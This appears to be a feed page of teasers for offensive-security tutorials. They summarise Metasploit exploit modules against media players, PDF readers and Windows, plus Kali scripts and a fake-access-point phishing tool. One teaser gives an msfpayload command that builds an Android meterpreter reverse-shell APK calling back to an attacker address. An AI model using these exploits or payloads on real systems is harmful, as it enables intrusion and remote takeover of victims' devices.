Hack Remote PC Using Beetel Connection Manager Net Config.ini Buffer Overflow
This module exploits a stack-based buffer overflow on Beetel Connection Manager. The vulnerability exists in the parising of the UserName parameter in the NetConfig.ini file. The module has been tested...
View ArticleGet Admin Privilege of Remote Victim PC using Windows SYSTEM Escalation via...
This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session is use is already elevated then the exploit will not run. The module relies on...
View ArticleHack Remote PC Using MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m...
This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in one of these 2 applications, a stack...
View ArticleExploit PC in LAN using Shadow Stream Recorder 3.0.1.7 Buffer Overflow
This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7. Using the application to open a specially crafted asx file, a buffer overflow may occur to allow arbitrary code execution under...
View ArticleHack PC in Network using MJM Core Player 2011 .s3m Stack Buffer Overflow
This module exploits a stack buffer overflow in MJM Core Player 2011 when opening a malicious s3m file in this applications, a stack buffer overflow can be triggered, resulting in arbitrary code...
View ArticleGet Admin Privilege of Remote Victim PC using Windows SYSTEM Escalation via...
This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session is use is already elevated then the exploit will not run. The module relies on...
View ArticleHack Remote PC Using MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m...
This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in one of these 2 applications, a stack...
View ArticleExploit PC in LAN using Shadow Stream Recorder 3.0.1.7 Buffer Overflow
This module exploits a buffer overflow in Shadow Stream Recorder 3.0.1.7. Using the application to open a specially crafted asx file, a buffer overflow may occur to allow arbitrary code execution under...
View ArticleHack PC in Network using MJM Core Player 2011 .s3m Stack Buffer Overflow
This module exploits a stack buffer overflow in MJM Core Player 2011 when opening a malicious s3m file in this applications, a stack buffer overflow can be triggered, resulting in arbitrary code...
View ArticleHacked Remote PC Using Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow
This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4 when opening a malicious pls file with the Digital Music Pad, a remote attacker could overflow a buffer and execute...
View ArticleHacked Remote PC Using Cool PDF Image Stream Buffer Overflow
This module exploits a stack buffer overflow in Cool PDF Reader prior to version 3.0.2.256. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image...
View ArticleHack Remote PC with Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation
This module exploits vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP...
View ArticleHow to Broadcast YouTube Video in Remote Windows,Linux or MAC System
This module will broadcast a Youtube video on all compromised systems. It will play the video in the target machine’s native browser in full screen mode. The VID datastore option is the “v” parameter...
View ArticleHack Remote PC Using Adobe Reader ToolButton Use After Free
This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback...
View ArticleHack Remote PC Using Real Networks RealPlayer Version Attribute Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by improper bounds checking of the version and encoding attributes...
View ArticleHack Remote Windows 7 PC Using IBM Forms Viewer Unicode Buffer Overflow
This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed XFDL files, with a long...
View ArticleRemotely Scan Malware/Virus in Victim PC with Metasploit
This module will check a file for malware on VirusTotal based on the checksum. Exploit Targets Windows 7 Windows XP Requirement Attacker: Kali Linux Victim PC: Windows 7 Open Kali Linux terminal type...
View ArticleHack Android Phone with Metasploit in Kali Linux
Open Kali Linux Terminal and type msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.6 lport= 443 R > /root/Desktop/files.apk -p for payload android/meterpreter/reverse_tcp Lhost (IP address...
View ArticleLazyKali -script for Kali Linux
A bash script for when you feel lazy. Adds quite a few tools to Kali Linux. Bleeding Edge Repos AngryIP Scanner Terminator Xchat Unicornscan Nautilus Open Terminal Simple-Ducky Subterfuge Ghost-Phisher...
View ArticlePwnSTAR: Pwn SofT Ap scRipt
A bash script to launch a Fake AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing and phishing. It can act as multi-client...
View Article